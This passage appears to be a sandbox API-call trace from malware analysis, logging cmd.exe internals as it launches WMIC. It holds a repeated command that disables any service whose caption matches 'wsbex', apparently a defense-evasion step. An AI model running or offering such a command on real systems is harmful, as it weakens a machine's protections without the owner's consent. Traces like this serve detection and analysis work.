lpcbData=0x497e694*=0x4) returned 0x0 [0117.541] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x9, lpcbData=0x497e694*=0x4) returned 0x0 [0117.541] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x0, lpData=0x497e698*=0x9, lpcbData=0x497e694*=0x1000) returned 0x2 [0117.541] RegCloseKey (hKey=0x94) returned 0x0 [0117.541] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29826 [0117.541] srand (_Seed=0x5ad29826) [0117.541] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'" [0117.541] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'" [0117.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0117.541] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c39d58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0117.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0117.541] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.541] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.541] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0117.541] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0117.541] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0117.541] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0117.541] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0117.541] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0117.541] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0117.541] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0117.541] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0117.541] GetEnvironmentStringsW () returned 0x4c37e00* [0117.541] FreeEnvironmentStringsA (penv="A") returned 1 [0117.542] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.542] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.542] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.542] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.542] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.542] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.542] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.542] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.542] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.542] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.542] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x497f464 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0117.542] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x497f464, lpFilePart=0x497f45c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x497f45c*="Desktop") returned 0x1d [0117.542] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0117.542] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x497f1e0 | out: lpFindFileData=0x497f1e0) returned 0x4c305c8 [0117.542] FindClose (in: hFindFile=0x4c305c8 | out: hFindFile=0x4c305c8) returned 1 [0117.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x497f1e0 | out: lpFindFileData=0x497f1e0) returned 0x4c305c8 [0117.542] FindClose (in: hFindFile=0x4c305c8 | out: hFindFile=0x4c305c8) returned 1 [0117.542] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0117.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x497f1e0 | out: lpFindFileData=0x497f1e0) returned 0x4c305c8 [0117.542] FindClose (in: hFindFile=0x4c305c8 | out: hFindFile=0x4c305c8) returned 1 [0117.542] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0117.542] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0117.542] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0117.543] GetEnvironmentStringsW () returned 0x4c37e00* [0117.543] FreeEnvironmentStringsA (penv="=") returned 1 [0117.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0117.543] GetConsoleOutputCP () returned 0x1b5 [0117.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0117.543] GetUserDefaultLCID () returned 0x409 [0117.543] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0117.543] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x497f594, cchData=128 | out: lpLCData="0") returned 2 [0117.543] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x497f594, cchData=128 | out: lpLCData="0") returned 2 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x497f594, cchData=128 | out: lpLCData="1") returned 2 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0117.544] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0117.544] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.545] GetConsoleTitleW (in: lpConsoleTitle=0x4c3aae8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0117.545] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0117.545] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0117.545] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0117.545] GetEnvironmentVariableW (in: lpName="wsbex", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.545] _wcsicmp (_String1="wsbex", _String2="CD") returned 20 [0117.545] _wcsicmp (_String1="wsbex", _String2="ERRORLEVEL") returned 18 [0117.545] _wcsicmp (_String1="wsbex", _String2="CMDEXTVERSION") returned 20 [0117.545] _wcsicmp (_String1="wsbex", _String2="CMDCMDLINE") returned 20 [0117.545] _wcsicmp (_String1="wsbex", _String2="DATE") returned 19 [0117.545] _wcsicmp (_String1="wsbex", _String2="TIME") returned 3 [0117.545] _wcsicmp (_String1="wsbex", _String2="RANDOM") returned 5 [0117.545] _wcsicmp (_String1="wsbex", _String2="HIGHESTNUMANODENUMBER") returned 15 [0117.546] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0117.546] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0117.546] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0117.546] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0117.546] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0117.546] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0117.546] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0117.547] GetConsoleTitleW (in: lpConsoleTitle=0x497f280, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.548] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0117.548] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0117.548] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0117.548] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0117.548] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0117.548] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0117.548] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0117.548] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0117.548] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0117.548] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0117.548] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0117.548] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0117.548] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0117.548] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0117.548] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0117.548] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0117.548] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0117.548] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0117.548] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0117.548] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0117.548] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0117.548] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0117.548] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0117.548] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0117.548] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0117.548] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0117.548] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0117.548] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0117.548] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0117.548] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0117.548] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0117.548] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0117.548] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0117.548] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0117.548] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0117.548] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0117.548] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0117.548] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0117.548] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0117.548] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0117.548] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0117.548] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0117.549] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0117.549] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0117.549] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0117.549] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0117.549] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0117.549] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0117.549] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0117.549] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0117.549] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0117.549] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0117.549] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0117.549] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0117.549] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0117.549] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0117.549] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0117.549] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0117.549] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0117.549] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0117.549] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0117.549] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0117.549] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0117.549] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0117.549] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0117.549] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0117.549] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0117.549] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0117.549] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0117.549] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0117.549] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0117.549] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0117.549] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0117.549] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0117.549] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0117.549] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0117.549] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0117.549] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0117.549] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0117.549] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0117.549] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0117.549] SetErrorMode (uMode=0x0) returned 0x0 [0117.550] SetErrorMode (uMode=0x1) returned 0x0 [0117.550] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c305d0, lpFilePart=0x497ed8c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x497ed8c*="Desktop") returned 0x1d [0117.550] SetErrorMode (uMode=0x0) returned 0x1 [0117.550] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0117.550] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.557] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.557] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0xffffffff [0117.558] GetLastError () returned 0x2 [0117.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.558] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0xffffffff [0117.558] GetLastError () returned 0x2 [0117.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0xffffffff [0117.558] GetLastError () returned 0x2 [0117.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0xffffffff [0117.558] GetLastError () returned 0x2 [0117.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0x4c3b2b0 [0117.558] FindClose (in: hFindFile=0x4c3b2b0 | out: hFindFile=0x4c3b2b0) returned 1 [0117.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0xffffffff [0117.559] GetLastError () returned 0x2 [0117.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x497eb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x497eb18) returned 0x4c3b2b0 [0117.559] FindClose (in: hFindFile=0x4c3b2b0 | out: hFindFile=0x4c3b2b0) returned 1 [0117.559] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.559] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.559] GetConsoleTitleW (in: lpConsoleTitle=0x497f00c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.559] InitializeProcThreadAttributeList (in: lpAttributeList=0x497ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x497ef1c | out: lpAttributeList=0x497ef38, lpSize=0x497ef1c) returned 1 [0117.559] UpdateProcThreadAttribute (in: lpAttributeList=0x497ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x497ef24, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x497ef38, lpPreviousValue=0x0) returned 1 [0117.559] GetStartupInfoW (in: lpStartupInfo=0x497ef70 | out: lpStartupInfo=0x497ef70*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0117.559] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0117.560] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0117.560] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0117.561] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x497eec0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x497ef0c | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x497ef0c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xfa4, dwThreadId=0xfa8)) returned 1 [0117.567] CloseHandle (hObject=0xa4) returned 1 [0117.567] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.567] GetEnvironmentStringsW () returned 0x4c39f68* [0117.568] FreeEnvironmentStringsA (penv="=") returned 1 [0117.568] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0118.309] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x497eea4 | out: lpExitCode=0x497eea4*=0x0) returned 1 [0118.309] CloseHandle (hObject=0xa8) returned 1 [0118.309] _vsnwprintf (in: _Buffer=0x497ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x497eeac | out: _Buffer="00000000") returned 8 [0118.309] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0118.309] GetEnvironmentStringsW () returned 0x4c3b3e0* [0118.309] FreeEnvironmentStringsA (penv="=") returned 1 [0118.309] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0118.310] GetEnvironmentStringsW () returned 0x4c3b3e0* [0118.310] FreeEnvironmentStringsA (penv="=") returned 1 [0118.310] DeleteProcThreadAttributeList (in: lpAttributeList=0x497ef38 | out: lpAttributeList=0x497ef38) [0118.310] _get_osfhandle (_FileHandle=1) returned 0x3c [0118.310] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0118.310] _get_osfhandle (_FileHandle=1) returned 0x3c [0118.310] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0118.310] _get_osfhandle (_FileHandle=0) returned 0x38 [0118.310] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0118.310] SetConsoleInputExeNameW () returned 0x1 [0118.310] GetConsoleOutputCP () returned 0x1b5 [0118.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0118.311] SetThreadUILanguage (LangId=0x0) returned 0x409 [0118.311] exit (_Code=0) Thread: id = 279 os_tid = 0xfa0 Process: id = "62" image_name = "conhost.exe" filename = 